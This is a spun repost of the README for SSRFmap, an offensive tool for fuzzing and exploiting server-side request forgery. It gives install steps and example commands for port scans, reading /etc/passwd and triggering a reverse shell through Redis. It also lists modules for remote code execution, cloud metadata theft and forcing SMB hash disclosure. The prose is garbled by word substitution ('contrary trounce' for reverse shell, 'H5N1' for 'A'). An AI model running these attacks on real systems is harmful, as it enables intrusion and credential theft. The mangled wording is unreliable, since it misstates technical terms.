Ssrfmap - Automatic Ssrf Fuzzer In Addition To Exploitation Tool

SSRF are frequently used to leverage actions on other services, this framework aims to let on in addition to exploit these services easily. SSRFmap takes a Burp asking file every bit input in addition to a parameter to fuzz.

Server Side Request Forgery or SSRF is a vulnerability inwards which an assaulter forces a server to perform requests on their behalf.

Guide / RTFM
Basic install from the Github repository.

git clone https://github.com/swisskyrepo/SSRFmap cd SSRFmap/ python3 ssrfmap.py  usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [--lhost LHOST] [--lport LPORT] [--level LEVEL]  optional arguments:   -h, --help     exhibit this assistance message in addition to teach out   -r REQFILE     SSRF Request file   -p PARAM       SSRF Parameter to target   -m MODULES     SSRF Modules to enable   -l HANDLER     Start an handler for a contrary trounce   --lhost LHOST  LHOST contrary trounce   --lport LPORT  LPORT contrary trounce   --level [LEVEL]  Level of attempt to perform (1-5, default: 1)

The default agency to purpose this script is the following.

# Launch a portscan on localhost in addition to read default files python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan  # Triggering a contrary trounce on a Redis python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242  # -l practise a listener for contrary trounce on the specified port # --lhost in addition to --lport function similar inwards Metasploit, these values are used to practise a contrary trounce payload # --level : mightiness to tweak payloads inwards monastic say to bypass simply about IDS/WAF. e.g: 127.0.0.1 -> [::] -> 0000: -> ...

H5N1 quick agency to attempt the framework tin hold out done amongst data/example.py SSRF service.

FLASK_APP=data/example.py flask run & python ssrfmap.py -r data/request.txt -p url -m readfiles

Modules
The next modules are already implemented in addition to tin hold out used amongst the -m argument.


Name	Description

`fastcgi`	FastCGI RCE
`redis`	Redis RCE
`github`	Github Enterprise RCE < 2.8.7
`zaddix`	Zaddix RCE
`mysql`	MySQL Command execution
`docker`	Docker Infoleaks via API
`smtp`	SMTP shipping mail
`portscan`	Scan ports for the host
`networkscan`	HTTP Ping sweep over the network
`readfiles`	Read files such every bit `/etc/passwd`
`alibaba`	Read files from the provider (e.g: meta-data, user-data)
`aws`	Read files from the provider (e.g: meta-data, user-data)
`digitalocean`	Read files from the provider (e.g: meta-data, user-data)
`socksproxy`	SOCKS4 Proxy
`smbhash`	Force an SMB authentication via a UNC Path

Inspired by

All yous demand to know most SSRF in addition to how may nosotros write tools to practise auto-detect - Auxy
How I Chained iv vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! - Orange Tsai
Blog on Gopherus Tool -SpyD3r
Gopherus - Github
SSRF testing - cujanovic

Download SSRFmap

Nexus

Ssrfmap - Automatic Ssrf Fuzzer In Addition To Exploitation Tool

Recent Posts

Facebook

Nexus

Ssrfmap - Automatic Ssrf Fuzzer In Addition To Exploitation Tool

You Might Also Like

Recent Posts

Facebook